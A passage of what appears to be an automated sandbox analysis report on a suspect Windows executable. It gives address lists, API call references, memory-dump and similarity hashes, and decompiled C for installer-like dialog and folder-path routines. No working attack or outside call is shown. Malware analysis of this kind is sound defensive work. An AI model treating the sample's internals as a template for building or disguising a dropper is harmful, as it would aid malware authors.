                                                                                                0x00404aae
                                                                                                0x00404ab0
                                                                                                0x00404ac0
                                                                                                0x00404aca
                                                                                                0x00404acc
                                                                                                0x00404acf
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00404ab2
                                                                                                0x00404ab2
                                                                                                0x00404ab2
                                                                                                0x00404ab5
                                                                                                0x00404ab8
                                                                                                0x00404aba
                                                                                                0x00404aba
                                                                                                0x00404aba
                                                                                                0x00404abb
                                                                                                0x00404abc
                                                                                                0x00404abc
                                                                                                0x00000000
                                                                                                0x00404ab2
                                                                                                0x00404a95
                                                                                                0x00404a79
                                                                                                0x004049b0
                                                                                                0x004049b6
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004049c2
                                                                                                0x004049c6
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004049d6
                                                                                                0x004049d8
                                                                                                0x004049db
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004049ed
                                                                                                0x004049ef
                                                                                                0x004049f2
                                                                                                0x004049fc
                                                                                                0x004049fe
                                                                                                0x004049ff
                                                                                                0x00404a00
                                                                                                0x00404a0f
                                                                                                0x00404a11
                                                                                                0x00404a18
                                                                                                0x00404a1b
                                                                                                0x00000000
                                                                                                0x00404a1b
                                                                                                0x004049f4
                                                                                                0x004049f7
                                                                                                0x004049fa
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004049fa
                                                                                                0x00000000
                                                                                                0x004048ba
                                                                                                0x0040466c
                                                                                                0x00404671
                                                                                                0x00404676
                                                                                                0x0040467b
                                                                                                0x0040467c
                                                                                                0x00404685
                                                                                                0x00404690
                                                                                                0x0040469b
                                                                                                0x004046a1
                                                                                                0x004046af
                                                                                                0x004046c4
                                                                                                0x004046c9
                                                                                                0x004046d4
                                                                                                0x004046dd
                                                                                                0x004046f2
                                                                                                0x00404703
                                                                                                0x00404710
                                                                                                0x00404710
                                                                                                0x00404715
                                                                                                0x0040471b
                                                                                                0x0040471d
                                                                                                0x00404720
                                                                                                0x00404725
                                                                                                0x0040472a
                                                                                                0x0040472c
                                                                                                0x0040472c
                                                                                                0x0040474c
                                                                                                0x0040474c
                                                                                                0x0040474e
                                                                                                0x0040474f
                                                                                                0x00404754
                                                                                                0x00404757
                                                                                                0x0040475a
                                                                                                0x0040475e
                                                                                                0x00404763
                                                                                                0x00404768
                                                                                                0x0040476c
                                                                                                0x00404771
                                                                                                0x00404776
                                                                                                0x00404778
                                                                                                0x0040477a
                                                                                                0x00404780
                                                                                                0x0040484a
                                                                                                0x0040485d
                                                                                                0x00000000
                                                                                                0x00404786
                                                                                                0x00404789
                                                                                                0x0040478c
                                                                                                0x0040478f
                                                                                                0x0040478f
                                                                                                0x00404795
                                                                                                0x0040479b
                                                                                                0x0040479e
                                                                                                0x004047a4
                                                                                                0x004047a5
                                                                                                0x004047aa
                                                                                                0x004047b3
                                                                                                0x004047ba
                                                                                                0x004047bd
                                                                                                0x004047c0
                                                                                                0x004047c3
                                                                                                0x004047fd
                                                                                                0x004047ff
                                                                                                0x00404828
                                                                                                0x00404801
                                                                                                0x0040480e
                                                                                                0x0040480e
                                                                                                0x004047c5
                                                                                                0x004047c8
                                                                                                0x004047d7
                                                                                                0x004047e1
                                                                                                0x004047e9
                                                                                                0x004047f0
                                                                                                0x004047f8
                                                                                                0x004047f8
                                                                                                0x004047c3
                                                                                                0x0040482e
                                                                                                0x0040482f
                                                                                                0x00404835
                                                                                                0x0040483b
                                                                                                0x0040483b
                                                                                                0x00404848
                                                                                                0x00404863
                                                                                                0x00404867
                                                                                                0x00404884
                                                                                                0x00404889
                                                                                                0x0040488c
                                                                                                0x0040488c
                                                                                                0x00000000
                                                                                                0x00404869
                                                                                                0x0040486e
                                                                                                0x00404877
                                                                                                0x00404c04
                                                                                                0x00404c16
                                                                                                0x00404c16
                                                                                                0x00404867
                                                                                                0x00000000
                                                                                                0x00404848
                                                                                                0x00404780

                                                                                                APIs
                                                                                                • GetDlgItem.USER32 ref: 0040462F
                                                                                                • GetDlgItem.USER32 ref: 0040463C
                                                                                                • GlobalAlloc.KERNEL32(00000040,00000002), ref: 00404688
                                                                                                • LoadBitmapA.USER32 ref: 0040469B
                                                                                                • SetWindowLongA.USER32 ref: 004046B5
                                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004046C9
                                                                                                • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 004046DD
                                                                                                • SendMessageA.USER32(?,00001109,00000002), ref: 004046F2
                                                                                                • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 004046FE
                                                                                                • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404710
                                                                                                • DeleteObject.GDI32(?), ref: 00404715
                                                                                                • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404740
                                                                                                • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 0040474C
                                                                                                • SendMessageA.USER32(?,00001100,00000000,?), ref: 004047E1
                                                                                                • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 0040480C
                                                                                                • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404820
                                                                                                • GetWindowLongA.USER32 ref: 0040484F
                                                                                                • SetWindowLongA.USER32 ref: 0040485D
                                                                                                • ShowWindow.USER32(?,00000005), ref: 0040486E
                                                                                                • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404971
                                                                                                • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 004049D6
                                                                                                • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 004049EB
                                                                                                • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404A0F
                                                                                                • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404A35
                                                                                                • ImageList_Destroy.COMCTL32(?), ref: 00404A4A
                                                                                                • GlobalFree.KERNEL32 ref: 00404A5A
                                                                                                • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404ACA
                                                                                                • SendMessageA.USER32(?,00001102,00000410,?), ref: 00404B73
                                                                                                • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404B82
                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 00404BA2
                                                                                                • ShowWindow.USER32(?,00000000), ref: 00404BF0
                                                                                                • GetDlgItem.USER32 ref: 00404BFB
                                                                                                • ShowWindow.USER32(00000000), ref: 00404C02
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.675084416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000001.00000002.675078765.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675094435.0000000000407000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675103409.0000000000409000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675141346.000000000042C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675150844.0000000000434000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675162007.0000000000437000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                • String ID: $M$N
                                                                                                • API String ID: 1638840714-813528018
                                                                                                • Opcode ID: f6787f79de443932d2fc7b26f3aa5085de6bf6d711a4170b7836f229e80d056d
                                                                                                • Instruction ID: c130209c976f96ebc92895edf0e38420b46f59adec9cf70198d20430cf8fc3c6
                                                                                                • Opcode Fuzzy Hash: f6787f79de443932d2fc7b26f3aa5085de6bf6d711a4170b7836f229e80d056d
                                                                                                • Instruction Fuzzy Hash: 1E02AEB0A00209AFDB20DF95DD45AAE7BB5FB84314F10817AF611BA2E1C7789D42CF58
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 78%
                                                                                                			E0040411B(struct HWND__* _a4, signed int _a8, unsigned int _a12, intOrPtr _a16) {
                                                                                                				signed int _v8;
                                                                                                				struct HWND__* _v12;
                                                                                                				long _v16;
                                                                                                				long _v20;
                                                                                                				char _v24;
                                                                                                				long _v28;
                                                                                                				char _v32;
                                                                                                				intOrPtr _v36;
                                                                                                				long _v40;
                                                                                                				signed int _v44;
                                                                                                				CHAR* _v52;
                                                                                                				intOrPtr _v56;
                                                                                                				intOrPtr _v60;
                                                                                                				intOrPtr _v64;
                                                                                                				CHAR* _v68;
                                                                                                				void _v72;
                                                                                                				char _v76;
                                                                                                				void* __ebx;
                                                                                                				void* __edi;
                                                                                                				void* __esi;
                                                                                                				intOrPtr _t81;
                                                                                                				long _t86;
                                                                                                				signed char* _t88;
                                                                                                				void* _t94;
                                                                                                				signed int _t95;
                                                                                                				signed short _t113;
                                                                                                				signed int _t117;
                                                                                                				char* _t122;
                                                                                                				intOrPtr _t124;
                                                                                                				intOrPtr* _t138;
                                                                                                				signed int* _t145;
                                                                                                				intOrPtr _t147;
                                                                                                				signed int _t148;
                                                                                                				signed int _t153;
                                                                                                				struct HWND__* _t159;
                                                                                                				CHAR* _t162;
                                                                                                				int _t163;
                                                                                                
                                                                                                				_t81 =  *0x4297a8;
                                                                                                				_v36 = _t81;
                                                                                                				_t162 = ( *(_t81 + 0x3c) << 0xa) + 0x42f000;
                                                                                                				_v8 =  *((intOrPtr*)(_t81 + 0x38));
                                                                                                				if(_a8 == 0x40b) {
                                                                                                					E004051D0(0x3fb, _t162);
                                                                                                					E00405B89(_t162);
                                                                                                				}
                                                                                                				if(_a8 != 0x110) {
                                                                                                					L8:
                                                                                                					if(_a8 != 0x111) {
                                                                                                						L20:
                                                                                                						if(_a8 == 0x40f) {
                                                                                                							L22:
                                                                                                							_v8 = _v8 & 0x00000000;
                                                                                                							_v12 = _v12 & 0x00000000;
                                                                                                							E004051D0(0x3fb, _t162);
                                                                                                							if(E004054FF(_t180, _t162) == 0) {
                                                                                                								_v8 = 1;
                                                                                                							}
                                                                                                							E0040592B(0x428fa0, _t162);
                                                                                                							_t145 = 0;
                                                                                                							_t86 = E00405C49(0);
                                                                                                							_v16 = _t86;
                                                                                                							if(_t86 == 0) {
                                                                                                								L31:
                                                                                                								E0040592B(0x428fa0, _t162);
                                                                                                								_t88 = E004054B2(0x428fa0);
                                                                                                								if(_t88 != _t145) {
                                                                                                									 *_t88 =  *_t88 & 0x00000000;
                                                                                                								}
                                                                                                								if(GetDiskFreeSpaceA(0x428fa0,  &_v20,  &_v28,  &_v16,  &_v40) == 0) {
                                                                                                									_t153 = _a8;
                                                                                                									goto L37;
                                                                                                								} else {
                                                                                                									_t163 = 0x400;
                                                                                                									_t153 = MulDiv(_v20 * _v28, _v16, 0x400);
                                                                                                									_v12 = 1;
                                                                                                									goto L38;
                                                                                                								}
                                                                                                							} else {
                                                                                                								if(0 == 0x428fa0) {
                                                                                                									L30:
                                                                                                									_t145 = 0;
                                                                                                									goto L31;
                                                                                                								} else {
                                                                                                									goto L26;
                                                                                                								}
                                                                                                								while(1) {
                                                                                                									L26:
                                                                                                									_t113 = _v16(0x428fa0,  &_v44,  &_v24,  &_v32);
                                                                                                									if(_t113 != 0) {
                                                                                                										break;
                                                                                                									}
                                                                                                									if(_t145 != 0) {
                                                                                                										 *_t145 =  *_t145 & _t113;
                                                                                                									}
                                                                                                									_t145 = E00405465(0x428fa0) - 1;
                                                                                                									 *_t145 = 0x5c;
                                                                                                									if(_t145 != 0x428fa0) {
                                                                                                										continue;
                                                                                                									} else {
                                                                                                										goto L30;
                                                                                                									}
                                                                                                								}
                                                                                                								_t153 = (_v40 << 0x00000020 | _v44) >> 0xa;
                                                                                                								_v12 = 1;
                                                                                                								_t145 = 0;
                                                                                                								L37:
                                                                                                								_t163 = 0x400;
                                                                                                								L38:
                                                                                                								_t94 = E0040456B(5);
                                                                                                								if(_v12 != _t145 && _t153 < _t94) {
                                                                                                									_v8 = 2;
                                                                                                								}
                                                                                                								_t147 =  *0x42e33c; // 0x6055b9
                                                                                                								if( *((intOrPtr*)(_t147 + 0x10)) != _t145) {
                                                                                                									E004044B6(0x3ff, 0xfffffffb, _t94);
                                                                                                									if(_v12 == _t145) {
                                                                                                										SetDlgItemTextA(_a4, _t163, 0x428f90);
                                                                                                									} else {
                                                                                                										E004044B6(_t163, 0xfffffffc, _t153);
                                                                                                									}
                                                                                                								}
                                                                                                								_t95 = _v8;
                                                                                                								 *0x42ec04 = _t95;
                                                                                                								if(_t95 == _t145) {
                                                                                                									_v8 = E0040140B(7);
                                                                                                								}
                                                                                                								if(( *(_v36 + 0x14) & _t163) != 0) {
                                                                                                									_v8 = _t145;
                                                                                                								}
                                                                                                								E00403CFF(0 | _v8 == _t145);
                                                                                                								if(_v8 == _t145 &&  *0x429fc4 == _t145) {
                                                                                                									E004040B0();
                                                                                                								}
                                                                                                								 *0x429fc4 = _t145;
                                                                                                								goto L53;
                                                                                                							}
                                                                                                						}
                                                                                                						_t180 = _a8 - 0x405;
                                                                                                						if(_a8 != 0x405) {
                                                                                                							goto L53;
                                                                                                						}
                                                                                                						goto L22;
                                                                                                					}
                                                                                                					_t117 = _a12 & 0x0000ffff;
                                                                                                					if(_t117 != 0x3fb) {
                                                                                                						L12:
                                                                                                						if(_t117 == 0x3e9) {
                                                                                                							_t148 = 7;
                                                                                                							memset( &_v72, 0, _t148 << 2);
                                                                                                							_v76 = _a4;
                                                                                                							_v68 = 0x429fd8;
                                                                                                							_v56 = E00404450;
                                                                                                							_v52 = _t162;
                                                                                                							_v64 = E0040594D(0x3fb, 0x429fd8, _t162, 0x4293a8, _v8);
                                                                                                							_t122 =  &_v76;
                                                                                                							_v60 = 0x41;
                                                                                                							__imp__SHBrowseForFolderA(_t122);
                                                                                                							if(_t122 == 0) {
                                                                                                								_a8 = 0x40f;
                                                                                                							} else {
                                                                                                								__imp__CoTaskMemFree(_t122);
                                                                                                								E0040541E(_t162);
                                                                                                								_t124 =  *0x42eb70; // 0x5ff628
                                                                                                								_t125 =  *((intOrPtr*)(_t124 + 0x11c));
                                                                                                								if( *((intOrPtr*)(_t124 + 0x11c)) != 0 && _t162 == "C:\\Users\\jones\\AppData\\Local\\Temp") {
                                                                                                									E0040594D(0x3fb, 0x429fd8, _t162, 0, _t125);
                                                                                                									if(lstrcmpiA(0x42db00, 0x429fd8) != 0) {
                                                                                                										lstrcatA(_t162, 0x42db00);
                                                                                                									}
                                                                                                								}
                                                                                                								 *0x429fc4 =  &(( *0x429fc4)[0]);
                                                                                                								SetDlgItemTextA(_a4, 0x3fb, _t162);
                                                                                                							}
                                                                                                						}
                                                                                                						goto L20;
                                                                                                					}
                                                                                                					if(_a12 >> 0x10 != 0x300) {
                                                                                                						goto L53;
                                                                                                					}
                                                                                                					_a8 = 0x40f;
                                                                                                					goto L12;
                                                                                                				} else {
                                                                                                					_t159 = _a4;
                                                                                                					_v12 = GetDlgItem(_t159, 0x3fb);
                                                                                                					if(E0040548B(_t162) != 0 && E004054B2(_t162) == 0) {
                                                                                                						E0040541E(_t162);
                                                                                                					}
                                                                                                					 *0x42e338 = _t159;
                                                                                                					SetWindowTextA(_v12, _t162);
                                                                                                					_push( *((intOrPtr*)(_a16 + 0x34)));
                                                                                                					_push(1);
                                                                                                					E00403CDD(_t159);
                                                                                                					_push( *((intOrPtr*)(_a16 + 0x30)));
                                                                                                					_push(0x14);
                                                                                                					E00403CDD(_t159);
                                                                                                					E00403D12(_v12);
                                                                                                					_t138 = E00405C49(7);
                                                                                                					if(_t138 == 0) {
                                                                                                						L53:
                                                                                                						return E00403D44(_a8, _a12, _a16);
                                                                                                					}
                                                                                                					 *_t138(_v12, 1);
                                                                                                					goto L8;
                                                                                                				}
                                                                                                			}


                                                                                                APIs
                                                                                                • GetDlgItem.USER32 ref: 00404167
                                                                                                • SetWindowTextA.USER32(?,?), ref: 00404194
                                                                                                • SHBrowseForFolderA.SHELL32(?,004293A8,?), ref: 00404249
                                                                                                • CoTaskMemFree.OLE32(00000000), ref: 00404254
                                                                                                • lstrcmpiA.KERNEL32(cegrwbhzuj,00429FD8,00000000,?,?), ref: 00404286
                                                                                                • lstrcatA.KERNEL32(?,cegrwbhzuj), ref: 00404292
                                                                                                • SetDlgItemTextA.USER32 ref: 004042A2
                                                                                                  • Part of subcall function 004051D0: GetDlgItemTextA.USER32 ref: 004051E3
                                                                                                  • Part of subcall function 00405B89: CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\xxTzyGLZx5.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004030BB,C:\Users\user\AppData\Local\Temp\,00000000,0040322D), ref: 00405BE1
                                                                                                  • Part of subcall function 00405B89: CharNextA.USER32(?,?,?,00000000), ref: 00405BEE
                                                                                                  • Part of subcall function 00405B89: CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\xxTzyGLZx5.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004030BB,C:\Users\user\AppData\Local\Temp\,00000000,0040322D), ref: 00405BF3
                                                                                                  • Part of subcall function 00405B89: CharPrevA.USER32(?,?,"C:\Users\user\Desktop\xxTzyGLZx5.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004030BB,C:\Users\user\AppData\Local\Temp\,00000000,0040322D), ref: 00405C03
                                                                                                • GetDiskFreeSpaceA.KERNEL32(00428FA0,?,?,0000040F,?,00428FA0,00428FA0,?,00000000,00428FA0,?,?,000003FB,?), ref: 0040435B
                                                                                                • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404376
                                                                                                • SetDlgItemTextA.USER32 ref: 004043EF
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.675084416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000001.00000002.675078765.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675094435.0000000000407000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675103409.0000000000409000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675141346.000000000042C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675150844.0000000000434000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675162007.0000000000437000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                                                                                                • String ID: A$C:\Users\user\AppData\Local\Temp$cegrwbhzuj
                                                                                                • API String ID: 2246997448-1579516440
                                                                                                • Opcode ID: 5b9bdf223cbd0333478b7b1187abfe1a1a1fc831b9bc42824364c4c8eca1df57
                                                                                                • Instruction ID: a19ed3a57cd3ea7516059bd6de19f3cb3834a8abb31794935fb739ca8bc8323d
                                                                                                • Opcode Fuzzy Hash: 5b9bdf223cbd0333478b7b1187abfe1a1a1fc831b9bc42824364c4c8eca1df57
                                                                                                • Instruction Fuzzy Hash: E09151B1A00218ABDB11DFA1DD85AEF7BB8EF84315F10407BFA04B62D1D77C99418B69
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 74%
                                                                                                			E0040594D(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
                                                                                                				signed int _v8;
                                                                                                				struct _ITEMIDLIST* _v12;
                                                                                                				signed int _v16;
                                                                                                				signed char _v20;
                                                                                                				signed char _v24;
                                                                                                				signed int _v28;
                                                                                                				signed int _t36;
                                                                                                				CHAR* _t37;
                                                                                                				signed char _t39;
                                                                                                				signed int _t40;
                                                                                                				int _t41;
                                                                                                				char _t51;
                                                                                                				char _t52;
                                                                                                				char _t54;
                                                                                                				char _t56;
                                                                                                				void* _t64;
                                                                                                				signed int _t68;
                                                                                                				intOrPtr _t72;
                                                                                                				signed int _t73;
                                                                                                				signed char _t74;
                                                                                                				intOrPtr _t77;
                                                                                                				char _t81;
                                                                                                				void* _t83;
                                                                                                				CHAR* _t84;
                                                                                                				void* _t86;
                                                                                                				signed int _t93;
                                                                                                				signed int _t95;
                                                                                                				void* _t96;
                                                                                                
                                                                                                				_t86 = __esi;
                                                                                                				_t83 = __edi;
                                                                                                				_t64 = __ebx;
                                                                                                				_t36 = _a8;
                                                                                                				if(_t36 < 0) {
                                                                                                					_t77 =  *0x42e33c; // 0x6055b9
                                                                                                					_t36 =  *(_t77 - 4 + _t36 * 4);
                                                                                                				}
                                                                                                				_t72 =  *0x42eb98; // 0x603dec
                                                                                                				_t73 = _t72 + _t36;
                                                                                                				_t37 = 0x42db00;
                                                                                                				_push(_t64);
                                                                                                				_push(_t86);
                                                                                                				_push(_t83);
                                                                                                				_t84 = 0x42db00;
                                                                                                				if(_a4 - 0x42db00 < 0x800) {
                                                                                                					_t84 = _a4;
                                                                                                					_a4 = _a4 & 0x00000000;
                                                                                                				}
                                                                                                				while(1) {
                                                                                                					_t81 =  *_t73;
                                                                                                					if(_t81 == 0) {
                                                                                                						break;
                                                                                                					}
                                                                                                					__eflags = _t84 - _t37 - 0x400;
                                                                                                					if(_t84 - _t37 >= 0x400) {
                                                                                                						break;
                                                                                                					}
                                                                                                					_t73 = _t73 + 1;
                                                                                                					__eflags = _t81 - 0xfc;
                                                                                                					_a8 = _t73;
                                                                                                					if(__eflags <= 0) {
                                                                                                						if(__eflags != 0) {
                                                                                                							 *_t84 = _t81;
                                                                                                							_t84 =  &(_t84[1]);
                                                                                                							__eflags = _t84;
                                                                                                						} else {
                                                                                                							 *_t84 =  *_t73;
                                                                                                							_t84 =  &(_t84[1]);
                                                                                                							_t73 = _t73 + 1;
                                                                                                						}
                                                                                                						continue;
                                                                                                					}
                                                                                                					_t39 =  *(_t73 + 1);
                                                                                                					_t74 =  *_t73;
                                                                                                					_a8 = _a8 + 2;
                                                                                                					_v20 = _t39;
                                                                                                					_t93 = (_t39 & 0x0000007f) << 0x00000007 | _t74 & 0x0000007f;
                                                                                                					_t68 = _t74;
                                                                                                					_t40 = _t39 | 0x00000080;
                                                                                                					__eflags = _t81 - 0xfe;
                                                                                                					_v28 = _t68;
                                                                                                					_v24 = _t74 | 0x00000080;
                                                                                                					_v16 = _t40;
                                                                                                					if(_t81 != 0xfe) {
                                                                                                						__eflags = _t81 - 0xfd;
                                                                                                						if(_t81 != 0xfd) {
                                                                                                							__eflags = _t81 - 0xff;
                                                                                                							if(_t81 == 0xff) {
                                                                                                								__eflags = (_t40 | 0xffffffff) - _t93;
                                                                                                								E0040594D(_t68, _t84, _t93, _t84, (_t40 | 0xffffffff) - _t93);
                                                                                                							}
                                                                                                							L41:
                                                                                                							_t41 = lstrlenA(_t84);
                                                                                                							_t73 = _a8;
                                                                                                							_t84 =  &(_t84[_t41]);
                                                                                                							_t37 = 0x42db00;
                                                                                                							continue;
                                                                                                						}
                                                                                                						__eflags = _t93 - 0x1d;
                                                                                                						if(_t93 != 0x1d) {
                                                                                                							__eflags = (_t93 << 0xa) + 0x42f000;
                                                                                                							E0040592B(_t84, (_t93 << 0xa) + 0x42f000);
                                                                                                						} else {
                                                                                                							E00405889(_t84,  *0x42eb68);
                                                                                                						}
                                                                                                						__eflags = _t93 + 0xffffffeb - 7;
                                                                                                						if(_t93 + 0xffffffeb < 7) {
                                                                                                							L32:
                                                                                                							E00405B89(_t84);
                                                                                                						}
                                                                                                						goto L41;
                                                                                                					}
                                                                                                					_t95 = 2;
                                                                                                					_t51 = GetVersion();
                                                                                                					__eflags = _t51;
                                                                                                					if(_t51 >= 0) {
                                                                                                						L12:
                                                                                                						_v8 = 1;
                                                                                                						L13:
                                                                                                						__eflags =  *0x42ebe4;
                                                                                                						if( *0x42ebe4 != 0) {
                                                                                                							_t95 = 4;
                                                                                                						}
                                                                                                						__eflags = _t68;
                                                                                                						if(_t68 >= 0) {
                                                                                                							__eflags = _t68 - 0x25;
                                                                                                							if(_t68 != 0x25) {
                                                                                                								__eflags = _t68 - 0x24;
                                                                                                								if(_t68 == 0x24) {
                                                                                                									GetWindowsDirectoryA(_t84, 0x400);
                                                                                                									_t95 = 0;
                                                                                                								}
                                                                                                								while(1) {
                                                                                                									__eflags = _t95;
                                                                                                									if(_t95 == 0) {
                                                                                                										goto L29;
                                                                                                									}
                                                                                                									_t52 =  *0x42eb64; // 0x73951340
                                                                                                									_t95 = _t95 - 1;
                                                                                                									__eflags = _t52;
                                                                                                									if(_t52 == 0) {
                                                                                                										L25:
                                                                                                										_t54 = SHGetSpecialFolderLocation( *0x42eb68,  *(_t96 + _t95 * 4 - 0x18),  &_v12);
                                                                                                										__eflags = _t54;
                                                                                                										if(_t54 != 0) {
                                                                                                											L27:
                                                                                                											 *_t84 =  *_t84 & 0x00000000;
                                                                                                											__eflags =  *_t84;
                                                                                                											continue;
                                                                                                										}
                                                                                                										__imp__SHGetPathFromIDListA(_v12, _t84);
                                                                                                										__imp__CoTaskMemFree(_v12);
                                                                                                										__eflags = _t54;
                                                                                                										if(_t54 != 0) {
                                                                                                											goto L29;
                                                                                                										}
                                                                                                										goto L27;
                                                                                                									}
                                                                                                									__eflags = _v8;
                                                                                                									if(_v8 == 0) {
                                                                                                										goto L25;
                                                                                                									}
                                                                                                									_t56 =  *_t52( *0x42eb68,  *(_t96 + _t95 * 4 - 0x18), 0, 0, _t84);
                                                                                                									__eflags = _t56;
                                                                                                									if(_t56 == 0) {
                                                                                                										goto L29;
                                                                                                									}
                                                                                                									goto L25;
                                                                                                								}
                                                                                                								goto L29;
                                                                                                							}
                                                                                                							GetSystemDirectoryA(_t84, 0x400);
                                                                                                							goto L29;
                                                                                                						} else {
                                                                                                							_t71 = (_t68 & 0x0000003f) +  *0x42eb98;
                                                                                                							E00405812(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t68 & 0x0000003f) +  *0x42eb98, _t84, _t68 & 0x00000040);
                                                                                                							__eflags =  *_t84;
                                                                                                							if( *_t84 != 0) {
                                                                                                								L30:
                                                                                                								__eflags = _v20 - 0x1a;
                                                                                                								if(_v20 == 0x1a) {
                                                                                                									lstrcatA(_t84, "\\Microsoft\\Internet Explorer\\Quick Launch");
                                                                                                								}
                                                                                                								goto L32;
                                                                                                							}
                                                                                                							E0040594D(_t71, _t84, _t95, _t84, _v20);
                                                                                                							L29:
                                                                                                							__eflags =  *_t84;
                                                                                                							if( *_t84 == 0) {
                                                                                                								goto L32;
                                                                                                							}
                                                                                                							goto L30;
                                                                                                						}
                                                                                                					}
                                                                                                					__eflags = _t51 - 0x5a04;
                                                                                                					if(_t51 == 0x5a04) {
                                                                                                						goto L12;
                                                                                                					}
                                                                                                					__eflags = _v20 - 0x23;
                                                                                                					if(_v20 == 0x23) {
                                                                                                						goto L12;
                                                                                                					}
                                                                                                					__eflags = _v20 - 0x2e;
                                                                                                					if(_v20 == 0x2e) {
                                                                                                						goto L12;
                                                                                                					} else {
                                                                                                						_v8 = _v8 & 0x00000000;
                                                                                                						goto L13;
                                                                                                					}
                                                                                                				}
                                                                                                				 *_t84 =  *_t84 & 0x00000000;
                                                                                                				if(_a4 == 0) {
                                                                                                					return _t37;
                                                                                                				}
                                                                                                				return E0040592B(_a4, _t37);
                                                                                                			}































                                                                                                0x00405a4a
                                                                                                0x00405a4d
                                                                                                0x00405aea
                                                                                                0x00405aea
                                                                                                0x00405aee
                                                                                                0x00405af6
                                                                                                0x00405af6
                                                                                                0x00000000
                                                                                                0x00405aee
                                                                                                0x00405a57
                                                                                                0x00405ae5
                                                                                                0x00405ae5
                                                                                                0x00405ae8
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00405ae8
                                                                                                0x00405a28
                                                                                                0x004059fb
                                                                                                0x004059ff
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00405a01
                                                                                                0x00405a05
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00405a07
                                                                                                0x00405a0b
                                                                                                0x00000000
                                                                                                0x00405a0d
                                                                                                0x00405a0d
                                                                                                0x00000000
                                                                                                0x00405a0d
                                                                                                0x00405a0b
                                                                                                0x00405b70
                                                                                                0x00405b7a
                                                                                                0x00405b86
                                                                                                0x00405b86
                                                                                                0x00000000

                                                                                                APIs
                                                                                                • GetVersion.KERNEL32(00000000,004297B0,00000000,00404D01,004297B0,00000000), ref: 004059F1
                                                                                                • GetSystemDirectoryA.KERNEL32(cegrwbhzuj,00000400), ref: 00405A6C
                                                                                                • GetWindowsDirectoryA.KERNEL32(cegrwbhzuj,00000400), ref: 00405A7F
                                                                                                • SHGetSpecialFolderLocation.SHELL32(?,0041B732), ref: 00405ABB
                                                                                                • SHGetPathFromIDListA.SHELL32(0041B732,cegrwbhzuj), ref: 00405AC9
                                                                                                • CoTaskMemFree.OLE32(0041B732), ref: 00405AD4
                                                                                                • lstrcatA.KERNEL32(cegrwbhzuj,\Microsoft\Internet Explorer\Quick Launch), ref: 00405AF6
                                                                                                • lstrlenA.KERNEL32(cegrwbhzuj,00000000,004297B0,00000000,00404D01,004297B0,00000000), ref: 00405B48
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.675084416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000001.00000002.675078765.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675094435.0000000000407000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675103409.0000000000409000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675141346.000000000042C000.00000004.00020000.sdmp
